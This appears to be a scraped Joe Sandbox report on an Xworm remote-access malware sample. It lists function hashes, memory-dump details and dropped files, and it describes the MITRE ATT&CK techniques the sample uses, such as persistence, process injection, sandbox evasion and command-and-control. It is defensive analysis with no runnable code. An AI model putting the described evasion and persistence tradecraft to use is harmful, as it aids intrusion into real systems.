Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5414290c9bdf9b2695d3a0243cea0d8efd31336e880aba7cf255daebbb4745
Instruction ID: 67a41b35c35c1ca11d2e46b059da0e911659863029f4205e0b1ef87b22b4740a
Opcode Fuzzy Hash: 6b5414290c9bdf9b2695d3a0243cea0d8efd31336e880aba7cf255daebbb4745
Instruction Fuzzy Hash: A921E566B0E5B18AE32AB3BC78754E53F90DF4623D70805FBD0ED8A0E7EC58144B5299

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B882101 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2379730047.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728441fde834922e4d87ed99c1b399dcb09601e94e9ce2965992d572264ed691
Instruction ID: a511023947b577c4f30716123ffdd21b65da779681602bb928e913f08e22bae1
Opcode Fuzzy Hash: 728441fde834922e4d87ed99c1b399dcb09601e94e9ce2965992d572264ed691
Instruction Fuzzy Hash: 70017005A0EB890FE752EB785C75475BFE0DF99310B0A04BBD9C8C30E7DC28AA458342

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B881699 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2379730047.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 707f8f93eb3cbf4dd2e9bccdb0075fd5c08e1bced4e4c0da5f06643fd2ada54b
Instruction ID: f3907a9e514eb4e89b130b60211c1c183667877baeb1d9813727b4b8fb828e87
Opcode Fuzzy Hash: 707f8f93eb3cbf4dd2e9bccdb0075fd5c08e1bced4e4c0da5f06643fd2ada54b
Instruction Fuzzy Hash: 1AF05532D0EA948FD350CB18DC24221FBE0EF4A120B0D06EBD0C8C60B2CAA859418342

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B881190 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2379730047.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6190d46413a45d496a9543abe31781a79af5d7aa31d3c6b7ab93465efb6e8fbe
Instruction ID: 5fd7b5279c53426d098583d6dec8350fa6e5d54fbf8e703631f58bd5066ee6f8
Opcode Fuzzy Hash: 6190d46413a45d496a9543abe31781a79af5d7aa31d3c6b7ab93465efb6e8fbe
Instruction Fuzzy Hash: F8D02B72F15C188BD7A4EA08E404170F3E0EB5C291705057BE498D2174C8A118414786

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9B88192F Relevance: 8.0, Strings: 6, Instructions: 489COMMON

Download Yara Rule

Strings

SAO_^, xrefs: 00007FFD9B8819E5
sAO_^, xrefs: 00007FFD9B88193C, 00007FFD9B8819AC
3AO_^, xrefs: 00007FFD9B881A6D
#AO_^, xrefs: 00007FFD9B881D08
CAO_^, xrefs: 00007FFD9B881A4C
cAO_^, xrefs: 00007FFD9B881944

Memory Dump Source

Source File: 0000000D.00000002.2379730047.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID: #AO_^$3AO_^$CAO_^$SAO_^$cAO_^$sAO_^
API String ID: 0-2355121239
Opcode ID: f80108b9b44a6af7302eeb02ca0f6284c273b67318ce145051239e6f1b11535f
Instruction ID: 5358354558c41da748e41c7aeeb9652fcddcc6cf743bb30b435dfb67f30c06ed
Opcode Fuzzy Hash: f80108b9b44a6af7302eeb02ca0f6284c273b67318ce145051239e6f1b11535f
Instruction Fuzzy Hash: 96E1E461B29E494FE7A8FB688865779B3D2EF9C700F45057DE05EC32E6DE38A8414381

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: XClient.exePID: 2080, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9B8811D1 Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2462736827.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15303c73f317c620fd1e9b9b1c06cf768822a353a24648b9c10bc49f24c5ccf9
Instruction ID: 74370b10dd666c71b66b3087bbfa84953ed607bcc2ddebcce0a34af611f7e14a
Opcode Fuzzy Hash: 15303c73f317c620fd1e9b9b1c06cf768822a353a24648b9c10bc49f24c5ccf9
Instruction Fuzzy Hash: 8201D422A0EACE0FEB52A76888701A87BB1EF5E340B0606B3D0A5C71E2DE3429058301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B880C4E Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2462736827.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ab929dceb96a6f57271d4e5ed42e05cbf8a496113a750a7fd517a98afe09db
Instruction ID: 31b9ee6870d94fdc65fc1437703b2197687e3763e44fcebbf5cfdeb102dc750d
Opcode Fuzzy Hash: 37ab929dceb96a6f57271d4e5ed42e05cbf8a496113a750a7fd517a98afe09db
Instruction Fuzzy Hash: E1617921B0FACA0FE356AB7848296757FE1DF8A214B0940FBD498C71EBDD5C9C468352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8816D9 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2462736827.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5059a5d47be042a6f800c75cfbebed3216c09bd702ba69f896fed85e795da7d9
Instruction ID: fa15a0634017cea4e1630805df7504098ac15269a4289011c115c533bd666614
Opcode Fuzzy Hash: 5059a5d47be042a6f800c75cfbebed3216c09bd702ba69f896fed85e795da7d9
Instruction Fuzzy Hash: 73614864F6590D4FD798BB7894BAAED76E1FF48205B800478E01FC36D6EE389901C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B880AE9 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2462736827.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecea93640871e90d9a7089ef111adb3b5a120fc120f1d307bfad6e124287e728
Instruction ID: b828a582e6bda0bc449436f9b55bb016b1fe67a2e908b0306ad3c6a6cc5346f4
Opcode Fuzzy Hash: ecea93640871e90d9a7089ef111adb3b5a120fc120f1d307bfad6e124287e728
Instruction Fuzzy Hash: 3231A761F19A4A8FEB49BBBC58697BC77D2FF98701F04017AE01DC32D6DE28A9014381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8809A5 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2462736827.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a87177da4d077625a841a1de816f7ffed07a9a12bc26f15fc1270f462a62d8
Instruction ID: 959554ee9880fc59e758f59bd0549bd0e23177284106b414095fd6bb8c0a1a49
Opcode Fuzzy Hash: 04a87177da4d077625a841a1de816f7ffed07a9a12bc26f15fc1270f462a62d8
Instruction Fuzzy Hash: 9D315170A2894E9FDB48EBA898B6AEDB7E1FF58304F400579D019D32C6DE386941CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B88200C Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2462736827.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b79caba628525a8a4e2ef260e51dee282d351c71264a605342d2854428182b
Instruction ID: f6dc3311cf923d247b5b1d6d18707a190e7c4722aedfc93226728d6536dca5fa
Opcode Fuzzy Hash: c3b79caba628525a8a4e2ef260e51dee282d351c71264a605342d2854428182b
Instruction Fuzzy Hash: 1A21B421B1C9484FE788EB2C9866778B6D2EF9C705F0545BEE05EC32DBDE689C418741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8810F0 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2462736827.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5414290c9bdf9b2695d3a0243cea0d8efd31336e880aba7cf255daebbb4745
Instruction ID: 67a41b35c35c1ca11d2e46b059da0e911659863029f4205e0b1ef87b22b4740a
Opcode Fuzzy Hash: 6b5414290c9bdf9b2695d3a0243cea0d8efd31336e880aba7cf255daebbb4745
Instruction Fuzzy Hash: A921E566B0E5B18AE32AB3BC78754E53F90DF4623D70805FBD0ED8A0E7EC58144B5299

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B882101 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2462736827.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edc90e4597e6b93fda29515185bc64daf1bcab5d6a032cbe8f9698c3587b5f1b
Instruction ID: 0fb490282f6cfa500868f9ff44c70a2ed7cd78fdc0df54adf94571da792d4572
Opcode Fuzzy Hash: edc90e4597e6b93fda29515185bc64daf1bcab5d6a032cbe8f9698c3587b5f1b
Instruction Fuzzy Hash: 8A014715E0EB890FE792AB685875475BFE0DF99310B0904ABE998C20E7D928AA458342

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B881699 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2462736827.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 707f8f93eb3cbf4dd2e9bccdb0075fd5c08e1bced4e4c0da5f06643fd2ada54b
Instruction ID: f3907a9e514eb4e89b130b60211c1c183667877baeb1d9813727b4b8fb828e87
Opcode Fuzzy Hash: 707f8f93eb3cbf4dd2e9bccdb0075fd5c08e1bced4e4c0da5f06643fd2ada54b
Instruction Fuzzy Hash: 1AF05532D0EA948FD350CB18DC24221FBE0EF4A120B0D06EBD0C8C60B2CAA859418342

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B881190 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2462736827.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6190d46413a45d496a9543abe31781a79af5d7aa31d3c6b7ab93465efb6e8fbe
Instruction ID: 5fd7b5279c53426d098583d6dec8350fa6e5d54fbf8e703631f58bd5066ee6f8
Opcode Fuzzy Hash: 6190d46413a45d496a9543abe31781a79af5d7aa31d3c6b7ab93465efb6e8fbe
Instruction Fuzzy Hash: F8D02B72F15C188BD7A4EA08E404170F3E0EB5C291705057BE498D2174C8A118414786

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9B88192F Relevance: 8.0, Strings: 6, Instructions: 489COMMON

Download Yara Rule

Strings

3AO_^, xrefs: 00007FFD9B881A6D
SAO_^, xrefs: 00007FFD9B8819E5
#AO_^, xrefs: 00007FFD9B881D08
CAO_^, xrefs: 00007FFD9B881A4C
sAO_^, xrefs: 00007FFD9B88193C, 00007FFD9B8819AC
cAO_^, xrefs: 00007FFD9B881944

Memory Dump Source

Source File: 0000000E.00000002.2462736827.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID: #AO_^$3AO_^$CAO_^$SAO_^$cAO_^$sAO_^
API String ID: 0-2355121239
Opcode ID: cc1a77c19c273b1fad4dfdbb57cb6d293f8a370ee4ba0149f851892983f5d575
Instruction ID: 2ba112f83f0b8b5a56a11f37c3c7367f62021183159d38f92240049d7605f8db
Opcode Fuzzy Hash: cc1a77c19c273b1fad4dfdbb57cb6d293f8a370ee4ba0149f851892983f5d575
Instruction Fuzzy Hash: ADE1E461B29E494BE7A8EB688865778B7D2FF9C704F04057DE05EC32E6DE38A8414781

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report z0LTqIdZ4A.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2srbw2cv.5rt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zll2czj.ujz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amf3b1ux.vy5.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqaufyng.uzk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fltctdoq.e5x.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmvaauh3.w50.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdtwnbtm.gf3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkhvfo0p.d2f.psm1

Windows Analysis Report
z0LTqIdZ4A.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre